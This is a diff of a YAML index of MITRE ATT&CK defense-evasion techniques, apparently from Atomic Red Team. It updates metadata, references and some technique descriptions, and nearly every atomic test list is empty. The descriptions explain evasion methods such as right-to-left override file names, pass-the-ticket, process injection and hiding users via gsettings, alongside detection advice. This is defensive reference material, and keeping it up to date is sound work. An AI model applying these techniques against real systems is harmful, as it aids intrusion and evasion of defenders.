+        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+          2020.
+        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1574.005:
     technique:
@@ -6752,7 +6872,7 @@ defense-evasion:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -6787,8 +6907,6 @@ defense-evasion:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1562.006:
     technique:
@@ -6879,12 +6997,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.006
     atomic_tests: []
   T1562.007:
     technique:
-      modified: '2023-04-15T00:25:36.502Z'
+      modified: '2024-10-16T19:38:57.374Z'
       name: Disable or Modify Cloud Firewall
       description: "Adversaries may disable or modify a firewall within a cloud environment
         to bypass controls that limit access to cloud resources. Cloud firewalls are
@@ -6892,19 +7009,25 @@ defense-evasion:
         Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments
         typically utilize restrictive security groups and firewall rules that only
         allow network activity from trusted IP addresses via expected ports and protocols.
-        An adversary may introduce new firewall rules or policies to allow access
-        into a victim cloud environment. For example, an adversary may use a script
-        or utility that creates new ingress rules in existing security groups to allow
-        any TCP/IP connectivity, or remove networking limitations to support traffic
-        associated with malicious activity (such as cryptomining).(Citation: Expel
-        IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials
-        2022)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications,
-        lateral movement, and/or data exfiltration that would otherwise not be allowed."
+        An adversary with appropriate permissions may introduce new firewall rules
+        or policies to allow access into a victim cloud environment and/or move laterally
+        from the cloud control plane to the data plane. For example, an adversary
+        may use a script or utility that creates new ingress rules in existing security
+        groups (or creates new security groups entirely) to allow any TCP/IP connectivity
+        to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud
+        Compute Credentials 2022) They may also remove networking limitations to support
+        traffic associated with malicious activity (such as cryptomining).(Citation:
+        Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute
+        Credentials 2022)\n\nModifying or disabling a cloud firewall may enable adversary
+        C2 communications, lateral movement, and/or data exfiltration that would otherwise
+        not be allowed. It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110)
+        or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
       x_mitre_contributors:
       - Expel
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor cloud logs for modification or creation of new security
         groups or firewall rules.
@@ -6913,7 +7036,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Firewall: Firewall Disable'
       - 'Firewall: Firewall Rule Modification'
@@ -6936,9 +7059,8 @@ defense-evasion:
         url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.002:
     technique:
@@ -6971,7 +7093,7 @@ defense-evasion:
         description: Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram
           - Cybercriminals exploited Telegram flaw to launch multipurpose attacks.
           Retrieved April 22, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T21:01:59.733Z'
       name: Right-to-Left Override
       description: |-
         Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named <code>March 25 \u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>.(Citation: Infosecinstitute RTLO Technique)
@@ -6990,8 +7112,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542.002:
     technique:
@@ -7022,7 +7142,7 @@ defense-evasion:
           health and make sure it's not already dying on you. Retrieved October 2,
           2018.
         source_name: ITWorld Hard Disk Health Dec 2014
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-01T20:43:55.632Z'
       name: Component Firmware
       description: |-
         Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -7052,12 +7172,10 @@ defense-evasion:
       - SYSTEM
       x_mitre_system_requirements:
       - Ability to update component device firmware from the host operating system.
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:59:22.125Z'
       name: Indicator Removal on Host
       description: |-
         Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
@@ -7083,9 +7201,8 @@ defense-evasion:
       - Windows
       - Containers
       - Network
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Scheduled Job: Scheduled Job Modification'
       - 'File: File Modification'
@@ -7116,14 +7233,13 @@ defense-evasion:
         external_id: T1070
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070
     atomic_tests: []
   T1550.003:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T15:21:09.330Z'
       name: 'Use Alternate Authentication Material: Pass the Ticket'
       description: |-
         Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -7143,6 +7259,7 @@ defense-evasion:
       x_mitre_contributors:
       - Vincent Le Toux
       - Ryan Becwar
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
 
@@ -7150,7 +7267,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -7166,34 +7282,35 @@ defense-evasion:
       id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
       created: '2020-01-30T17:03:43.072Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1550/003
         external_id: T1550.003
-      - source_name: ADSecurity AD Kerberos Attacks
-        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
-          Kerberos Attacks. Retrieved June 2, 2016.
-        url: https://adsecurity.org/?p=556
-      - source_name: GentilKiwi Pass the Ticket
-        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
-          2, 2016.
-        url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: CERT-EU Golden Ticket Protection
+        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       - source_name: Campbell 2014
         description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
           4, 2014.
         url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+      - source_name: GentilKiwi Pass the Ticket
+        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+          12, 2024.
+        url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: ADSecurity AD Kerberos Attacks
+        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+          Kerberos Attacks. Retrieved June 2, 2016.
+        url: https://adsecurity.org/?p=556
       - source_name: Stealthbits Overpass-the-Hash
         description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
           Attacks. Retrieved February 4, 2021.
         url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
-      - source_name: CERT-EU Golden Ticket Protection
-        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
-          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
-        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1550.003
     atomic_tests: []
   T1036.004:
@@ -7259,7 +7376,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.004
     atomic_tests: []
   T1055.004:
@@ -7298,7 +7414,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:23:46.476Z'
       name: 'Process Injection: Asynchronous Procedure Call'
       description: "Adversaries may inject malicious code into processes via the asynchronous
         procedure call (APC) queue in order to evade process-based defenses as well
@@ -7347,8 +7463,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.004
     atomic_tests: []
   T1647:
@@ -7399,7 +7513,7 @@ defense-evasion:
         pairs to insert environment variables, such as <code>LSEnvironment</code>,
         to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation:
         wardle chp2 persistence)(Citation: eset_osx_flashback)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T22:00:33.375Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Plist File Modification
       x_mitre_detection: "Monitor for common command-line editors used to modify plist
@@ -7420,7 +7534,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1647
     atomic_tests: []
   T1553.005:
@@ -7487,7 +7600,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.005
     atomic_tests: []
   T1600.002:
@@ -7510,7 +7622,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:37:48.503Z'
       name: Disable Crypto Hardware
       description: |-
         Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
@@ -7531,8 +7643,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542:
     technique:
@@ -7593,11 +7703,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1612:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-15T16:22:09.807Z'
       name: Build Image on Host
       description: "Adversaries may build a container image directly on a host to
         bypass defenses that monitor for the retrieval of malicious images from a
@@ -7662,7 +7771,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1612
     atomic_tests:
     - name: Build Image On Host
@@ -7723,7 +7831,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:21:11.178Z'
       name: 'Process Injection: Portable Executable Injection'
       description: "Adversaries may inject portable executables (PE) into processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -7767,8 +7875,6 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.002
     atomic_tests: []
   T1218.012:
@@ -7824,7 +7930,7 @@ defense-evasion:
         not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation:
         Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation:
         Nick Tyrer GitHub) "
-      modified: '2022-10-25T14:00:00.188Z'
+      modified: '2022-05-20T17:35:28.221Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Verclsid
       x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -7848,7 +7954,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.010:
     technique:
@@ -7939,40 +8044,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.010
     atomic_tests: []
   T1497:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      - Sunny Neo
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
-      type: attack-pattern
-      created: '2019-04-17T22:22:24.505Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497
-        url: https://attack.mitre.org/techniques/T1497
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Unit 42 Pirpi July 2015
-        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
-        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
-          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
-          23, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.049Z'
       name: Virtualization/Sandbox Evasion
       description: |+
         Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -7984,6 +8060,10 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      - Sunny Neo
+      x_mitre_deprecated: false
       x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
         techniques will likely occur in the first steps of an operation but may also
         occur throughout as an adversary learns the environment. Data and events should
@@ -7994,8 +8074,14 @@ defense-evasion:
         required. Monitoring for suspicious processes being spawned that gather a
         variety of system information or perform other forms of Discovery, especially
         in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
       x_mitre_version: '1.3'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -8005,9 +8091,28 @@ defense-evasion:
       - Host forensic analysis
       - Signature-based detection
       - Static File Analysis
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+      created: '2019-04-17T22:22:24.505Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497
+        external_id: T1497
+      - source_name: Unit 42 Pirpi July 2015
+        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+          23, 2019.'
+        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1218.005:
     technique:
@@ -8060,7 +8165,7 @@ defense-evasion:
       - source_name: LOLBAS Mshta
         url: https://lolbas-project.github.io/lolbas/Binaries/Mshta/
         description: LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T20:38:28.802Z'
       name: 'Signed Binary Proxy Execution: Mshta'
       description: "Adversaries may abuse mshta.exe to proxy execution of malicious
         .hta files and Javascript or VBScript through a trusted Windows utility. There
@@ -8098,68 +8203,72 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.005
     atomic_tests: []
   T1480:
     technique:
+      modified: '2024-06-07T14:30:23.491Z'
+      name: Execution Guardrails
+      description: |-
+        Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
+
+        Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
+
+        Adversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Nick Carr, Mandiant
+      x_mitre_deprecated: false
+      x_mitre_detection: Detecting the use of guardrails may be difficult depending
+        on the implementation. Monitoring for suspicious processes being spawned that
+        gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
+        especially in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Nick Carr, Mandiant
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Command: Command Execution'
+      x_mitre_defense_bypassed:
+      - Anti-virus
+      - Host Forensic Analysis
+      - Signature-based Detection
+      - Static File Analysis
       type: attack-pattern
       id: attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852
       created: '2019-01-31T02:10:08.261Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1480
         url: https://attack.mitre.org/techniques/T1480
+        external_id: T1480
       - source_name: FireEye Outlook Dec 2019
-        url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
         description: 'McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking
           the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved
           June 23, 2020.'
+        url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
+      - source_name: Trellix-Qakbot
+        description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+          Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+          Distribution. Retrieved June 7, 2024.
+        url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
       - source_name: FireEye Kevin Mandia Guardrails
-        url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
         description: Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says
           U.S. malware is more restrained than adversaries'. Retrieved January 17,
           2019.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
-
-        Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Execution Guardrails
-      x_mitre_detection: Detecting the use of guardrails may be difficult depending
-        on the implementation. Monitoring for suspicious processes being spawned that
-        gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
-        especially in a short period of time, may aid in detection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Command: Command Execution'
-      x_mitre_defense_bypassed:
-      - Anti-virus
-      - Host Forensic Analysis
-      - Signature-based Detection
-      - Static File Analysis
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.001:
     technique:
@@ -8217,7 +8326,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.001
     atomic_tests: []
   T1205.001:
@@ -8243,7 +8351,7 @@ defense-evasion:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -8268,8 +8376,6 @@ defense-evasion:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1027.012:
     technique:
@@ -8330,7 +8436,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.002:
     technique:
@@ -8403,7 +8508,7 @@ defense-evasion:
         <code>sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true</code>).(Citation:
         Hide GDM User Accounts) Display Managers are not anchored to specific distributions
         and may be changed by a user or adversary."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T02:31:01.315Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Hide Artifacts: Hidden Users'
       x_mitre_detection: "Monitor for users that may be hidden from the login screen
@@ -8432,7 +8537,6 @@ defense-evasion:
       - 'User Account: User Account Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.002
     atomic_tests: []
   T1134.003:
@@ -8496,11 +8600,10 @@ defense-evasion:
